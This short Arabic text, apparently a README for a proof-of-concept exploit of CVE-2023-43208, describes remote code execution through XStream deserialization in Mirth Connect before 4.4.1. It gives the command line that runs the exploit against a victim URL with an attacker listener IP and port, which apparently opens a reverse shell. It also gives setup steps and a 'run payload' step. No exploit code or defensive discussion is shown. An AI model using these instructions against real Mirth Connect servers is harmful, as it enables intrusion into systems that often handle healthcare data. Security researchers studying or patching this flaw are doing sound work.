
استغلال الثغرات
هذا السكربت هو إثبات مفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Mirth Connect (الإصدارات الأقدم من 4.4.1). يستغل ثغرة في إلغاء تسلسل XStream عبر API.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
يُنصح باستخدام بيئة افتراضية:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#تنفيذ payload
python3 payload.py